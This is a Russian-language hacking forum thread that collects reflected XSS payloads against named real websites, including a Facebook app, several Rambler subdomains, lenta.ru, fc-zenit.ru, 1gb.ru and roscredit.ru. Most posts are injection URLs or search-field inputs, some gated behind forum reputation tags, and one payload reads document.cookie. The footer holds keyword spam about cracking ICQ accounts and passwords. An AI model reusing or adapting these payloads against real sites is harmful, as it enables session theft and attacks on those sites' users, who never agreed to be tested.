Старый 03.03.2011, 22:28   #1
therf2
RAM 256MB
 
Аватар для therf2
 
Регистрация: 17.12.2010
Сообщений: 320
therf2 - весьма и весьма положительная личностьtherf2 - весьма и весьма положительная личность
therf2 вне форума

По умолчанию Пассивные XSS


Здесь собираем/редактируем базу пассивных xss.
Пасивка на Facebook
[hide=100]http://apps.facebook.com/mmaprofighter/?src="><script>alert(/xss/)</script>[/hide]
Cборка пасивок на рамблер
[hide=30]
http://foto.rambler.ru/introduce.html?back="><script>alert(/XSS/)</script>
http://skate.rambler.ru/popup.html?alt="><script>alert(1)</script>
http://afisha.rambler.ru/message.html?id=128434&pg="><script>alert(1)</script>
http://planeta.rambler.ru/community/icq/?tags=419972"><script>alert(1)</script>
http://autorambler.ru/cars/by-brand/?brand=12&model=30&no=1&period=day"><script>alert( 1)</script>
http://kids.rambler.ru/faq/271063/tns-counter.ru?p=1<script>alert('mr.net')</script>
http://finance.rambler.ru/calculators/hypothec/?sum=1&years=31&interest="><script>alert(1)</script>
[/hide]
На lenta.ru
[hide=30]http://lenta.ru/conf/opechatka?url=http://lenta.ru/advert/reklama.htm%22%3E%3Cscript%3Ealert('xss')%3C/script%3E[/hide]
Для любителей спорта[hide=30]
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
[/hide]
[hide=30]
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
В поле поиск вводи
"><script>alert('xss')</script>[/hide]

Добавлено через 58 минут 55 секунд
Вот и Зенит
[HIDE=30]www.fc-zenit.ru/main/news/?ns=1&tx="'><</script><script>alert(document.cookie)</script>[/HIDE]
  Ответить с цитированием
Последний раз редактировалось therf2; 04.03.2011 в 17:24. Причина: Добавлено сообщение
Ответ: Пассивные XSS
Старый 04.03.2011, 11:00   #2
yse
Изгнан
 
Аватар для yse
 
Регистрация: 28.07.2009
Сообщений: 123
yse как роза среди колючекyse как роза среди колючекyse как роза среди колючек
yse вне форума
По умолчанию Ответ: Пассивные XSS

на счет facebook я бы хайд побольше дал .

плюсик за facebook.
  Ответить с цитированием
Последний раз редактировалось yse; 04.03.2011 в 11:03.
Ответ: Пассивные XSS
Старый 05.03.2011, 17:17   #3
therf2
RAM 256MB
 
Аватар для therf2
 
Регистрация: 17.12.2010
Сообщений: 320
therf2 - весьма и весьма положительная личностьtherf2 - весьма и весьма положительная личность
therf2 вне форума
По умолчанию Ответ: Пассивные XSS

Только что нашел
[HIDE=5]
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
[/HIDE]

Добавлено через 19 часов 37 минут 44 секунды
Вот на 1gb.ru
[HIDE=30]
В поле поиск.
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.][/HIDE]
[HIDE=5]
В поле"Проверить, зарегистрировать или перенести имя:" вставляем
Код:
"><script>alert('xss')</script>


[/HIDE]
  Ответить с цитированием
Последний раз редактировалось therf2; 05.03.2011 в 17:19. Причина: Добавлено сообщение
Ответ: Пассивные XSS
Старый 22.07.2012, 13:29   #4
whitehack
RAM 32MB
 
Аватар для whitehack
 
Регистрация: 09.04.2012
Сообщений: 44
whitehack Новичок
whitehack вне форума
По умолчанию Ответ: Пассивные XSS

Цитата:
Код:
http://www.uchodzcy.org.pl
Код:
Kontakt
Код:
'><''>"><script>alert(/XSS/)</script>
Код:
http://roscredit.ru
Код:
'><''>"><script>alert(/XSS/)</script>
  Ответить с цитированием
Последний раз редактировалось whitehack; 22.07.2012 в 13:32.
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.



взломать аську аську взломать взлом программы сделать взлом программы как сделать взлом программы хакерские сайты как легко взломать аську лучшие хакерские сайты топ список хакерские сайты взлом паролей легкий взлом паролей

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd. Перевод: zCarot